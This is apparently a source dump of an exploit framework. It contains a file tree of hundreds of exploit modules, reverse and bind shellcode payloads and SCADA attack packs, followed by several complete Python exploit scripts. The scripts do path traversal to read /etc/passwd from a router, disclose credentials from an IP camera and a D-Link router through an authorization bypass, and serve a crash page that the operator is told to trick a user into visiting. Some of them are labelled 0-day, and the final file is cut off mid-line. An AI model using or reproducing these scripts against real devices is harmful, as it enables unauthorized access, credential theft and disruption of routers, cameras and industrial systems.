├── .gitignore ├── 3rdParty ├── ef_armo_pack_demo │ ├── LICENSE.txt │ ├── changelog.txt │ └── exploits │ │ ├── ef_plc_wireless_router_GPN2_4P21-C-CN_afd.py │ │ ├── efa_ATGCLabs_ActiveLN_HQLi.py │ │ ├── efa_ATGCLabs_Freezer_Web_Acceess_HQLi.py │ │ ├── efa_CleverMic_1011S_12_ip_camera_info_disclosure.py │ │ ├── efa_IceHRM_info_disclosure.py │ │ ├── efa_Socomec_RemoteView_PRO_afu_rce.py │ │ ├── efa_acunetix_sbo.py │ │ ├── efa_adobe_coldfusion_2018_rce.py │ │ ├── efa_apache_struts_rce.py │ │ ├── efa_apache_tomcat_fu_rce.py │ │ ├── efa_baidu_netdisk_dos.py │ │ ├── efa_cisco_catalyst_2960_pe.py │ │ ├── efa_cisco_license_manager_server_directory_traversal.py │ │ ├── efa_clinic_office5_db_management.py │ │ ├── efa_delta_mcis_upsentry2012_privilege_escalation.py │ │ ├── efa_dlink_dir8xx_pd.py │ │ ├── efa_drupal_coder_rce.py │ │ ├── efa_ebrigade_erp_4_5_esql.py │ │ ├── efa_ezviz_cs_cv210_ipcamera_management_or_dos.py │ │ ├── efa_ezviz_cs_cv210_ipcamera_snapshot.py │ │ ├── efa_honeywell_hed1pr3_ipcamera_info_disclosure.py │ │ ├── efa_iball_adsl2_router_rr.py │ │ ├── efa_inoerp_privilege_escalation.py │ │ ├── efa_kaspersky_anti_virus_file_server_fd.py │ │ ├── efa_kkmserver_2_1_26_16_dirtav.py │ │ ├── efa_kkmserver_2_1_26_16_dos.py │ │ ├── efa_levelone_wcs_2030_directory_traversal.py │ │ ├── efa_navigate_cms_8.2_ab_rce.py │ │ ├── efa_nelsonit_erp_6_3_1_esql.py │ │ ├── efa_netwave_ip_camera_information_disclosure.py │ │ ├── efa_openclinic_sqli.py │ │ ├── efa_oracle_java_se_xxe.py │ │ ├── efa_orient_ip33_sh14cp_snapshot.py │ │ ├── efa_sonicDICOM_privilege_escalation.py │ │ ├── efa_symantec_messaging_gateway_dt.py │ │ ├── efa_tp_link_tl_wa850re_rr.py │ │ ├── efa_trend_micro_control_manager_fu_rce.py │ │ ├── efa_trend_micro_threat_discovery_appliance_rce.py │ │ ├── efa_trendmicro_control_manager_sqli_rce.py │ │ ├── efa_trendnet_tk_ip101_privilege_escalation.py │ │ ├── efa_typesetter_cms_dir_listing.py │ │ ├── efa_uc_httpd_directory_traversal.py │ │ ├── efa_upsmon_pro_fd.py │ │ ├── 
efa_vstarcom_ip_camera_info_disclosure.py │ │ ├── efa_weberp_sqli.py │ │ ├── efa_wordpress_events_sqli.py │ │ ├── efa_xnat_info_disclosure.py │ │ ├── efa_zabbix_sqli.py │ │ ├── efs_domoticz_4_9700_bof.py │ │ └── efs_domoticz_4_9700_sqli.py ├── ef_scada_pack_demo │ ├── LICENSE.txt │ ├── changelog.txt │ └── exploits │ │ ├── efa_delta_mcis_upsentry2012_info_disclosure.py │ │ ├── efa_open_source_erp_arbitrary_sql_execution.py │ │ ├── efa_open_source_erp_dir_trav.py │ │ ├── efs_Becknoff_CX9020_Reboot.py │ │ ├── efs_DELTA_IA_Robot_DRAstudio_afd.py │ │ ├── efs_DoMore_Designer_afd.py │ │ ├── efs_Elipse_E3_e3server_remote_stop.py │ │ ├── efs_GP_PRO_EX_WinGP_Runtime_afd.py │ │ ├── efs_IPESOFT_D2000_SCADA_DirTrav.py │ │ ├── efs_OSHMI_remote_shutdown.py │ │ ├── efs_OpenAPC_BeamServer_DoS.py │ │ ├── efs_PASvisu_dos.py │ │ ├── efs_PeakHMI_Webserver_DirTrav.py │ │ ├── efs_SpiderControl_SCADA_Editor_DirTrav.py │ │ ├── efs_advantech_webaccess_8_3_2_dashboard_bsqli.py │ │ ├── efs_advantech_webaccess_8_3_2_dashboardconfig_afd.py │ │ ├── efs_advantech_webaccess_8_3_directory_traversal.py │ │ ├── efs_advantech_webaccess_8_3_file_delete.py │ │ ├── efs_advantech_webaccess_dashboardeditor_afd.py │ │ ├── efs_atvise_3_2_afd.py │ │ ├── efs_atvise_3_2_info_disclosure.py │ │ ├── efs_autobase_netserver_dos.py │ │ ├── efs_cogent_datahub_7_3_x_dos.py │ │ ├── efs_delta_DIAEnergie_info_disclosure.py │ │ ├── efs_eisbaer_scada_directory_traversal2.py │ │ ├── efs_eisbaer_scada_dt.py │ │ ├── efs_esa_automation_crew_webserver_dir_trav.py │ │ ├── efs_indigo_scada_information_disclosure.py │ │ ├── efs_inductive_automation_7_6_4_designer_xxe.py │ │ ├── efs_inductive_automation_ignition_7_5_4_bSQLi.py │ │ ├── efs_inductive_automation_ignition_7_5_4_xxe.py │ │ ├── efs_infrasightlabs_vscopeserver_privilege_escalation.py │ │ ├── efs_kingscada_aeserver_dos.py │ │ ├── efs_laquis_scada_directory_traversal.py │ │ ├── efs_logi_cals_logi_RTS_RTShttpd_DoS.py │ │ ├── efs_logi_cals_logi_RTS_dir_trav.py │ │ ├── 
efs_loytec_lweb900_server_dir_trav.py │ │ ├── efs_lsis_XP_Manager_DoS.py │ │ ├── efs_lsis_wXP_DoS.py │ │ ├── efs_moxa_mxview_dos.py │ │ ├── efs_promotic_scada_dos.py │ │ ├── efs_quickhmi_directory_traversal.py │ │ ├── efs_rcware_dos.py │ │ ├── efs_reliance_scada_directory_traversal.py │ │ ├── efs_s3scada_remote_stop.py │ │ ├── efs_trihedral_vtscada_dos.py │ │ ├── efs_u_motion_builder_hardcoded_credentials.py │ │ ├── efs_vbase_vokserver_info_disclosure.py │ │ ├── efs_winplc7_webserver_arbitrary_file_disclosure.py │ │ └── efs_wintr_scada_hardcoded_credentials_directory_traversal.py └── readme.txt ├── 3rdPartyTools ├── ShellcodesUtils │ ├── ld.exe │ ├── ld.gold.exe │ ├── ld64.exe │ ├── libwinpthread-1.dll │ ├── nasm.exe │ └── objdump.exe ├── setuptools.zip ├── six.zip └── websocket.zip ├── Documentation └── TD.docx ├── README.md ├── core ├── BruteForcer.py ├── Commands.py ├── DirectoryTraversal.py ├── Modules.py ├── OptionsParser.py ├── PortScannerMT.py ├── ReportGenerator.py ├── ServiceMessagesHandler.py ├── Sploit.py ├── WebHelper.py ├── WebSocketServer.py ├── __init__.py ├── helpers │ ├── __init__.py │ ├── archieve │ │ ├── __init__.py │ │ ├── jar.py │ │ └── zip.py │ └── java │ │ ├── Serialization.py │ │ └── __init__.py └── passwords.txt ├── data ├── CVE-2015-8103 │ ├── serialized_class_loader │ ├── serialized_file_writer │ ├── serialized_jenkins_header │ ├── serialized_payload_footer │ └── serialized_payload_header └── report_templates │ ├── common.html │ └── row_template.html ├── docs ├── css │ └── bootstrap.min.css ├── files │ ├── template.py │ └── vulnserver_bof │ │ ├── vulnserver.jpg │ │ ├── vulnserver2.jpg │ │ └── vulnserver_buffer_overflow.py ├── index.html └── js │ └── bootstrap.min.js ├── exploits ├── blackstratus_logstorm_rce.py ├── cross_os_shellcode_generator.py ├── directory_traversal_scanner.py ├── ef_bitdefender_gravityzone_dt.py ├── ef_cogento_datahub_afd.py ├── ef_cuppacms_afd.py ├── ef_cuppacms_lfi.py ├── ef_e_detective_afd.py ├── 
ef_easyfile_webserver_sbo.py ├── ef_fhfs_rce.py ├── ef_jboss_java_serialization_rce.py ├── ef_jenkins_java_deserialize_afu.py ├── ef_joomla_gallery_wd_bsqli.py ├── ef_solarwinds_log_and_event_manager_rce.py ├── ef_symantec_pcanywhere_host_rce.py ├── ef_wincc_miniweb_dos.py ├── efa_aastra_6755i_SIP_SP4_dos.py ├── efa_argosoft_mini_mail_server_dos.py ├── efa_autodesk_backburner_manager_dos.py ├── efa_azure_data_expert_ulimate_bof_rce.py ├── efa_blueiris_dos.py ├── efa_boa_web_server_wapopen_fd.py ├── efa_boonex_dolphin_fu_rce.py ├── efa_bozon_rce.py ├── efa_brightsign_digital_signage_fd.py ├── efa_builderengine_fu.py ├── efa_cerberus_ftp_server_dos.py ├── efa_cobub_razor_pe.py ├── efa_conext_combox_dos.py ├── efa_conquest_dicom_server_dos.py ├── efa_dalim_software_es_core_fd.py ├── efa_dasan_networks_gpon_routers_rce.py ├── efa_dirlist_fu.py ├── efa_disk_pulse_enterprise_bof_rce.py ├── efa_disk_savvy_enterprise_bof_rce.py ├── efa_disk_savvy_enterprise_bof_rce_g.py ├── efa_disk_sorter_enterprise_bof_rce.py ├── efa_dup_scout_enterprise_bof_rce.py ├── efa_easy_chat_server_pd.py ├── efa_easycom_for_php_dos.py ├── efa_evostream_media_server_dos.py ├── efa_exim_rce.py ├── efa_exponent_cms_bsqli.py ├── efa_extraputty_tftp_dos.py ├── efa_flir_thermal_camera_fd.py ├── efa_ftpshell_bof_rce.py ├── efa_geuterbruck_g_cam_rce.py ├── efa_home_web_server_rce.py ├── efa_horos_web_portal_dt.py ├── efa_humax_hg100r_cd.py ├── efa_iball_batton_150m_cd.py ├── efa_ibm_websphere_rce.py ├── efa_inoerp_bsqli.py ├── efa_invoiceplane_pr.py ├── efa_joomla3_admin_takeover.py ├── efa_joomla_googlemap_landkarten_sqli.py ├── efa_joomla_jquickcontact_bsqli.py ├── efa_joomla_js_autoz_bsqli.py ├── efa_joomla_js_jobs_bsqli.py ├── efa_joomla_medialibrary_free_bsqli.py ├── efa_joomla_nextgen_editor_bsqli.py ├── efa_joomla_realpin_bsqli.py ├── efa_joomla_saxum_astro_bsqli.py ├── efa_joomla_saxum_numerology_bsqli.py ├── efa_joomla_saxum_picker_bsqli.py ├── efa_joomla_simplecalendar_bsqli.py ├── 
efa_joomla_squadmanagement_bsqli.py ├── efa_joomla_zh_baidumap_sqli.py ├── efa_joomla_zh_googlemap_sqli.py ├── efa_joomla_zh_yandexmap_sqli.py ├── efa_kodi_fd.py ├── efa_laravel_log_viewer_fd.py ├── efa_lepton_fu.py ├── efa_make_or_brake_sqli.py ├── efa_microsoft_windows_dvd_maker_xxe.py ├── efa_microsoft_windows_media_center_xxe.py ├── efa_microsoft_windows_remote_assistance_xxe.py ├── efa_mobaxterm_fd.py ├── efa_mongoose_web_server_rce.py ├── efa_monstra_cms_fu_rce.py ├── efa_mvpower_dvr_rce.py ├── efa_my_photo_gallery_sqli.py ├── efa_netgear_dgn2200_router_rce.py ├── efa_nuked_klan_cms_fu.py ├── efa_oscommerce_fu_rce.py ├── efa_php_melody_sqli.py ├── efa_pirelli_drg_a115_adsl_router_dns_change.py ├── efa_ravpower_dos.py ├── efa_ravpower_rce.py ├── efa_real_estate_script_fd.py ├── efa_sap_ase_odata_server_dos.py ├── efa_saplpd_dos.py ├── efa_serva_dos.py ├── efa_server_auditor_fd.py ├── efa_solarwinds_kiwi_syslog_dos.py ├── efa_sweetrice_csrf_rce.py ├── efa_sweetrice_fd.py ├── efa_sweetrice_fu.py ├── efa_sync_breeze_enterprise_bof_rce.py ├── efa_sysgauge_bof_rce.py ├── efa_tenda_adsl_modem_d840r_dns_change.py ├── efa_tenda_routers_dns_change.py ├── efa_tiki_wiki_fd.py ├── efa_tor_browser_dos.py ├── efa_trueonline_billion_5200wt_router_rce.py ├── efa_trueonline_zyxel_p660hnt_router_rce.py ├── efa_ulterius_server_fd.py ├── efa_vbulletin_afd.py ├── efa_vtiger_crm_fu_rce.py ├── efa_vx_search_enterprise_bof_rce.py ├── efa_winaxe_ftp_bof_rce.py ├── efa_wordpress_cafesalivation_theme_fd.py ├── efa_wordpress_church_admin_fd.py ├── efa_wordpress_codeart_google_mp3_player_fd.py ├── efa_wordpress_content_timeline_bsqli.py ├── efa_wordpress_dbox_3d_slider_lite_bsqli.py ├── efa_wordpress_delete_all_comments_fu.py ├── efa_wordpress_dtracker_bsqli.py ├── efa_wordpress_duena_theme_fd.py ├── efa_wordpress_email_subscribers_and_newsletters_id.py ├── efa_wordpress_email_users_sqli.py ├── efa_wordpress_endlesshorizon_theme_fd.py ├── efa_wordpress_event_espresso_free_bsqli.py ├── 
efa_wordpress_formbuilder_sqli.py ├── efa_wordpress_javo_spot_premium_theme_fd.py ├── efa_wordpress_liberator_theme_fd.py ├── efa_wordpress_link_library_sqli.py ├── efa_wordpress_newspro2891_theme_fd.py ├── efa_wordpress_olimometer_bsqli.py ├── efa_wordpress_oxygen_theme_fd.py ├── efa_wordpress_plugin_answer_my_question_sqli.py ├── efa_wordpress_product_catalog_sqli.py ├── efa_wordpress_responsive_image_gallery_sqli.py ├── efa_wordpress_simply_poll_sqli.py ├── efa_wordpress_testimonials_sqli.py ├── efa_wordpress_top_10_bsqli.py ├── efa_wordpress_ultimate_product_catalogue_sqli.py ├── efa_wordpress_vault_fd.py ├── efa_wordpress_wp_jobs_sqli.py ├── efa_xitami_web_server_dos.py ├── efa_xuezhuli_filesharing_fd.py ├── efa_zivif_pr115_204_p_rs_rce.py ├── efs_DirectAdmin_CSRF.py ├── efs_Yokogawa_CENTUM_DoS.py ├── efs_advantech_studio_dt.py ├── efs_centurystar9_scada_dt.py ├── efs_codesys3_afu.py ├── efs_codesys3_files_manipulation.py ├── efs_codesys_webserver_sbo.py ├── efs_daqfactory_dos.py ├── efs_emerson_roclink800_activex_rce.py ├── efs_levistudio_SBO.py ├── efs_promise_webpam.py ├── efs_proxmox_configuration_overwrite.py ├── efs_realwin21c_bof_rce.py ├── efs_searchblox_dt.py ├── efs_spidercontrol_scada_editor_dos.py ├── efs_ucancode_activex_rce.py ├── efs_vijeo_web_gate_dt.py ├── efs_wincc_miniweb_dos.py ├── efs_wincc_miniweb_dt.py ├── efs_winlog_sbo.py ├── efs_yokogawa_centon_bkbdcopyd_bof.py ├── efs_yokogawa_centon_bkhodeq_bof.py ├── elastix_2_x_bsqli.py ├── fake_ftp_server.py ├── ntp_dos.py ├── os_shellcode_generator.py ├── password_hash_finder.py ├── pligg_cms_blind_sqli.py ├── port_scanner.py ├── schoolhoscms_afu.py ├── simple_openssl_heartbleed_scanner.py ├── standalone_listener.py ├── sugarcrm_rest_deserialize_code_exec.py ├── tp_link_td_8151N_DoS.py ├── vBulletin_5_x_blind_sqli.py ├── vBulletin_deserialize_code_exec.py └── wordpress_plugin_cysteme_afd.py ├── help └── README.txt ├── listener ├── __init__.py ├── bind_connector.py └── listener.py ├── logo.png 
├── shellcodes ├── Asm.py ├── DotNetShellcode.py ├── Encoders.py ├── JavaShellcode.py ├── PhpShellcode.py ├── PythonShellcode.py ├── README ├── Runshellcode.py ├── ShellUtils.py ├── ShellcodeGenerator.py ├── Shellcodes.py ├── __init__.py ├── data │ ├── java │ │ ├── reverse_tcp │ │ │ └── Payload.class │ │ └── src │ │ │ └── ReverseTCP │ │ │ └── Payload.java │ ├── linux │ │ ├── bind_tcp.bin │ │ ├── reverse_tcp.bin │ │ ├── src │ │ │ ├── bind_tcp.asm │ │ │ └── reverse_tcp.asm │ │ └── x64 │ │ │ ├── bind_tcp.bin │ │ │ ├── reverse_tcp.bin │ │ │ └── src │ │ │ ├── bind_tcp.asm │ │ │ └── reverse_tcp.asm │ └── windows │ │ ├── bind_tcp.bin │ │ ├── reverse_tcp.bin │ │ ├── src │ │ ├── bind_tcp.asm │ │ └── reverse_tcp.asm │ │ └── x64 │ │ ├── bind_tcp.bin │ │ ├── reverse_tcp.bin │ │ └── src │ │ ├── bind_tcp.asm │ │ └── reverse_tcp.asm ├── shellcode.py └── shellcode_payload.py ├── start.py └── ui ├── __init__.py ├── css ├── bootstrap.min.css ├── codemirror.css ├── main.css └── toastr.min.css ├── fonts ├── glyphicons-halflings-regular.eot ├── glyphicons-halflings-regular.svg ├── glyphicons-halflings-regular.ttf ├── glyphicons-halflings-regular.woff └── glyphicons-halflings-regular.woff2 ├── httpd.py ├── icons ├── listener-connected.ico ├── listener-disconnected.ico ├── listener-enabled.ico └── transparent.ico ├── index.html ├── index.jade ├── js ├── bootstrap.min.js ├── codemirror.js ├── components.js ├── guiCommands.js ├── jquery.min.js ├── lodash.min.js ├── main.js ├── rsvp.js ├── serverCommands.js ├── toastr.min.js ├── vue.min.js └── ws.js └── mode └── python ├── index.html └── python.js /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | Reports/ 3 | Logs/ 4 | /.idea 5 | /tmp/Webserver20160906100204 6 | /OUTPUTS 7 | /tmp 8 | exploits 9 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/LICENSE.txt: 
-------------------------------------------------------------------------------- 1 | https://www.gnu.org/licenses/gpl-3.0.txt -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/changelog.txt: -------------------------------------------------------------------------------- 1 | 2 | 1.0 3 | September 18, 2022 4 | 5 | efa_acunetix_sbo.py 6 | efa_adobe_coldfusion_2018_rce.py 7 | efa_apache_struts_rce.py 8 | efa_apache_tomcat_fu_rce.py 9 | efa_ATGCLabs_ActiveLN_HQLi.py 10 | efa_ATGCLabs_Freezer_Web_Acceess_HQLi.py 11 | efa_baidu_netdisk_dos.py 12 | efa_cisco_catalyst_2960_pe.py 13 | efa_cisco_license_manager_server_directory_traversal.py 14 | efa_CleverMic_1011S_12_ip_camera_info_disclosure.py 15 | efa_clinic_office5_db_management.py 16 | efa_delta_mcis_upsentry2012_privilege_escalation.py 17 | efa_dlink_dir8xx_pd.py 18 | efa_drupal_coder_rce.py 19 | efa_ebrigade_erp_4_5_esql.py 20 | efa_ezviz_cs_cv210_ipcamera_management_or_dos.py 21 | efa_ezviz_cs_cv210_ipcamera_snapshot.py 22 | efa_honeywell_hed1pr3_ipcamera_info_disclosure.py 23 | efa_iball_adsl2_router_rr.py 24 | efa_IceHRM_info_disclosure.py 25 | efa_inoerp_privilege_escalation.py 26 | efa_kaspersky_anti_virus_file_server_fd.py 27 | efa_kkmserver_2_1_26_16_dirtav.py 28 | efa_kkmserver_2_1_26_16_dos.py 29 | efa_levelone_wcs_2030_directory_traversal.py 30 | efa_navigate_cms_8.2_ab_rce.py 31 | efa_nelsonit_erp_6_3_1_esql.py 32 | efa_netwave_ip_camera_information_disclosure.py 33 | efa_openclinic_sqli.py 34 | efa_oracle_java_se_xxe.py 35 | efa_orient_ip33_sh14cp_snapshot.py 36 | efa_Socomec_RemoteView_PRO_afu_rce.py 37 | efa_sonicDICOM_privilege_escalation.py 38 | efa_symantec_messaging_gateway_dt.py 39 | efa_tp_link_tl_wa850re_rr.py 40 | efa_trendmicro_control_manager_sqli_rce.py 41 | efa_trendnet_tk_ip101_privilege_escalation.py 42 | efa_trend_micro_control_manager_fu_rce.py 43 | efa_trend_micro_threat_discovery_appliance_rce.py 44 | 
efa_typesetter_cms_dir_listing.py 45 | efa_uc_httpd_directory_traversal.py 46 | efa_upsmon_pro_fd.py 47 | efa_vstarcom_ip_camera_info_disclosure.py 48 | efa_weberp_sqli.py 49 | efa_wordpress_events_sqli.py 50 | efa_xnat_info_disclosure.py 51 | efa_zabbix_sqli.py 52 | efs_domoticz_4_9700_bof.py 53 | efs_domoticz_4_9700_sqli.py 54 | ef_plc_wireless_router_GPN2_4P21-C-CN_afd.py -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/ef_plc_wireless_router_GPN2_4P21-C-CN_afd.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import urllib2 8 | 9 | sys.path.append("./core") 10 | from Sploit import Sploit 11 | 12 | INFO = {} 13 | INFO['NAME'] = "ef_plc_wireless_router_GPN2.4P21-C-CN_afd" 14 | INFO['DESCRIPTION'] = "PLC Wireless Router GPN2.4P21-C-CN Arbitrary File Disclosure" 15 | INFO['VENDOR'] = "" 16 | INFO['DOWNLOAD_LINK'] = '' 17 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/40304/'] 18 | INFO["CVE Name"] = "0-day" 19 | INFO["NOTES"] = """PLC Wireless Router GPN2.4P21-C-CN Arbitrary File Disclosure. For example this module get /etc/password from router 20 | """ 21 | 22 | INFO['CHANGELOG'] = "30 Aug, 2016. Written by Gleg team." 
23 | INFO['PATH'] = 'Exploits/Hardware/' 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = {} 27 | OPTIONS["HOST"] = '192.168.1.123' 28 | OPTIONS["PORT"] = 8080 29 | 30 | class exploit(Sploit): 31 | def __init__(self, host = "", port = 0, logger = None): 32 | Sploit.__init__(self, logger = logger) 33 | self.name = INFO['NAME'] 34 | self.port = port 35 | self.host = host 36 | 37 | def args(self): 38 | self.args = Sploit.args(self, OPTIONS) 39 | self.host = self.args.get('HOST', self.host) 40 | self.port = int(self.args.get('PORT', self.port)) 41 | 42 | def make_url(self, path = ''): 43 | return 'http://{}:{}{}'.format(self.host, self.port, path) 44 | 45 | def run(self): 46 | self.args() 47 | self.log("Attacking {}".format(self.host)) 48 | 49 | url = self.make_url('/cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:retag=1&var:subpage=-') 50 | url2 = self.make_url('/cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=setup&var:page=connected') 51 | try: 52 | fd = urllib2.urlopen(url) 53 | cookie = fd.headers['set-cookie'] 54 | self.log('Cookie ' + cookie) 55 | 56 | request = urllib2.Request(url2) 57 | request.add_header('Cookie', cookie) 58 | fd = urllib2.urlopen(request) 59 | data = '\n' + fd.read() 60 | 61 | self.log(data) 62 | 63 | except Exception as ex: 64 | self.log(ex) 65 | self.finish(False) 66 | 67 | self.finish(True) 68 | if __name__ == '__main__': 69 | """ 70 | By now we only have the tool mode for exploit.. 71 | Later we would have standalone mode also. 72 | """ 73 | 74 | print "Running exploit %s .. 
" % INFO['NAME'] 75 | e = exploit('', 80) 76 | e.run() 77 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_CleverMic_1011S_12_ip_camera_info_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import pprint 5 | from collections import OrderedDict 6 | from Sploit import Sploit 7 | 8 | INFO = {} 9 | INFO['NAME'] = "efa_CleverMic_1011S_12_ip_camera_info_disclosure" 10 | INFO['DESCRIPTION'] = "CleverMic 1011S-12 IP Camera Info Disclosure" 11 | INFO['VENDOR'] = "https://unitsolutions.ru/ptz-camera/1227-ptz-kamera-clevermic-1011s-12.html" 12 | INFO["CVE Name"] = "0day" 13 | INFO["DOWNLOAD_LINK"] = "" 14 | INFO["LINKS"] = [] 15 | INFO['CHANGELOG'] = "21 Dec, 2017" 16 | INFO['PATH'] = "General/" 17 | INFO["NOTES"] = """ 18 | Unauthorized attacker can obtain users credentials. 19 | Tested against firmware V2.4.3 2017-7-17. 20 | """ 21 | 22 | # Must be in every module, to be set by framework 23 | OPTIONS = OrderedDict() 24 | OPTIONS["HOST"] = "192.168.1.13" 25 | OPTIONS["PORT"] = 80 26 | 27 | 28 | class exploit(Sploit): 29 | def __init__(self,host="", 30 | port=0, ssl=False, 31 | logger=None): 32 | Sploit.__init__(self, logger=logger) 33 | 34 | def args(self): 35 | self.args = Sploit.args(self, OPTIONS) 36 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 37 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 38 | 39 | def make_url(self, path=''): 40 | url = 'http://{}:{}/{}'.format(self.host, self.port, path) 41 | return url 42 | 43 | def run(self): 44 | #Get options from gui 45 | self.args() 46 | self.log("[*] Trying to connect to {}".format(self.make_url())) 47 | url = self.make_url('ajaxcom?szCmd={"GetEnv":{"SysUser":{}}}') 48 | res = urllib2.urlopen(url).read() 49 | self.log('[+]\r\n' + res) 50 | self.finish(True) 51 | 52 | 53 | if __name__ == '__main__': 54 | """ 55 | By now we only have the tool 
56 | mode for exploit.. 57 | Later we would have 58 | standalone mode also. 59 | """ 60 | print "Running exploit %s .. " % INFO['NAME'] 61 | e = exploit("192.168.0.1",80) 62 | e.run() 63 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_baidu_netdisk_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | 9 | sys.path.append("./core") 10 | from Sploit import Sploit 11 | from WebHelper import SimpleWebServer 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_baidu_netdisk_dos" 15 | INFO['DESCRIPTION'] = "Baidu NetDisk - Denial Of Service" 16 | INFO['VENDOR'] = "https://pan.baidu.com/" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = '' 19 | INFO["CVE Name"] = "0-day" 20 | INFO["NOTES"] = """Baidu NetDisk crashed if user visit special crafted web page 21 | """ 22 | 23 | INFO['CHANGELOG'] = "13 Sep, 2017. Written by Gleg team." 
24 | INFO['PATH'] = 'Exploits/Dos/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS['HOST'] = '127.0.0.1', dict(description = 'Your IP') 29 | OPTIONS["PORT"] = 8080, dict(description = 'Your port for web server') 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host = "", port = 0, logger = None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.port = port 36 | self.host = host 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.port = int(self.args.get('PORT', self.port)) 41 | self.host = self.args.get('HOST', self.host) 42 | 43 | def run(self): 44 | self.args() 45 | self.log("Serve on {}".format(self.host)) 46 | 47 | html = '' 48 | 49 | server = SimpleWebServer(self.host, self.port) 50 | server.add_file_for_share("index.html", html) 51 | server.start_serve() 52 | 53 | self.log('Ok. Now trick user who runs baidu netdisk visit your address http://{}:{}/index.html'.format(self.host, self.port)) 54 | self.log('Wait connection for 120s') 55 | time.sleep(120) 56 | 57 | server.stop_serve() 58 | self.log('Server stopped. If user visited your page his netdisk crashed') 59 | self.log('Done') 60 | self.finish(True) 61 | 62 | if __name__ == '__main__': 63 | """ 64 | By now we only have the tool mode for exploit.. 65 | Later we would have standalone mode also. 66 | """ 67 | 68 | print "Running exploit %s .. " % INFO['NAME'] 69 | e = exploit('', 80) 70 | e.run() 71 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_dlink_dir8xx_pd.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import urllib2 8 | import time 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_dlink_dir8xx_pd" 15 | INFO['DESCRIPTION'] = "D-Link DIR8xx routers - credential disclosure vulnerability." 16 | INFO['VENDOR'] = "http://www.dlink.ru/" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """ 21 | - DIR885L 22 | - DIR890L 23 | - DIR895L 24 | - and others. 25 | phpcgi is responsible for processing requests to .php, .asp and .txt pages. Also, it checks whether a user is authorized or not. Nevertheless, if a request is crafted in a proper way, an attacker can easily bypass authorization and execute a script that returns a login and password to a router. 26 | """ 27 | 28 | INFO['CHANGELOG'] = "19 Sep, 2017. Written by Gleg team." 
29 | INFO['PATH'] = 'Exploits/Hardware/' 30 | 31 | # Must be in every module, to be set by framework 32 | OPTIONS = {} 33 | OPTIONS['HOST'] = '127.0.0.1', dict(description = 'Target IP') 34 | OPTIONS["PORT"] = 80 35 | 36 | class exploit(Sploit): 37 | def __init__(self, host = "", port = 0, logger = None): 38 | Sploit.__init__(self, logger = logger) 39 | self.name = INFO['NAME'] 40 | self.port = port 41 | self.host = host 42 | 43 | def args(self): 44 | self.args = Sploit.args(self, OPTIONS) 45 | self.port = int(self.args.get('PORT', self.port)) 46 | self.host = self.args.get('HOST', self.host) 47 | 48 | def make_url(self, path = ''): 49 | return 'http://{}:{}{}'.format(self.host, self.port, path) 50 | 51 | def run(self): 52 | self.args() 53 | self.log("Attacking {}".format(self.host)) 54 | 55 | url = self.make_url('/getcfg.php') 56 | data = 'A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1' 57 | request = urllib2.Request(url, data) 58 | try: 59 | fd = urllib2.urlopen(request) 60 | result = fd.read() 61 | self.log(result) 62 | except Exception as e: 63 | self.log(e) 64 | self.finish(False) 65 | self.finish(True) 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool mode for exploit.. 70 | Later we would have standalone mode also. 71 | """ 72 | 73 | print "Running exploit %s .. 
